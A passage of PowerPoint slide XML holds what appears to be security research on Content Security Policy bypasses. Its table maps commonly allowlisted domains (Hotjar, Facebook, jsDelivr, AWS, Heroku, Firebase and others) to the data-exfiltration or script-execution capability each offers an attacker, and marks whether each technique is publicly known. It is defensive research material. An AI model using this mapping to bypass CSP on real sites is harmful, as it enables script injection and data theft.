                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Entity</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Allowed Domain</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Capabilities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Well-known</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3621222706"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hotjar</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.hotjar.com, ask.hotjar.io</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No *</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2107117426"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Facebook</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.facebook.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No *</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1268481039"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0" err="1">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Jsdelivr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2300" b="1" dirty="0">
                        <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.jsdeliver.com, cdn.jsdelivr.net</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3719631833"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Amazon AWS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.amazonaws.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil, Exec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No *</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2100132004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Amazon CloudFront</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2300" b="1" dirty="0">
                        <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.cloudfront.net</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil, Exec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No *</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3448830291"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure Websites</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.azurewebsites.net, *.azurestaticapps.net</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="65000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, Exec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No *</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="401614382"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Salesforce Heroku</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.herokuapp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil, Exec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No *</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4000057267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Google Firebase</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.firebaseapp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exfil, Exec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2300" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes **</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1684169265"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644CC0CB-45D7-4DD0-3DE7-0D8978FD824D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254474" y="6218964"/>
            <a:ext cx="11683048" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0"/>
              <a:t>* I have mostly used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1"/>
              <a:t>Hacktricks.xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0"/>
              <a:t>, H1 reports, “CSP Evaluator” source code, and Google to decide whether a technique could be considered well-known or not. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0"/>
              <a:t>** A limited number of reports in h1 found, but no public posts about how to do it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{762BB7CB-1148-D6DA-B8DA-F2B233CBAA54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269900" y="1824097"/>
            <a:ext cx="3332282" cy="350932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF00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1F77220D-466D-E6C9-6002-9C1A78F420D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269900" y="2241444"/>
            <a:ext cx="3332282" cy="1649069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent2">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994F0C94-46A6-FFED-F16C-22224EA4A596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254474" y="3956929"/>
            <a:ext cx="3332282" cy="1986672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
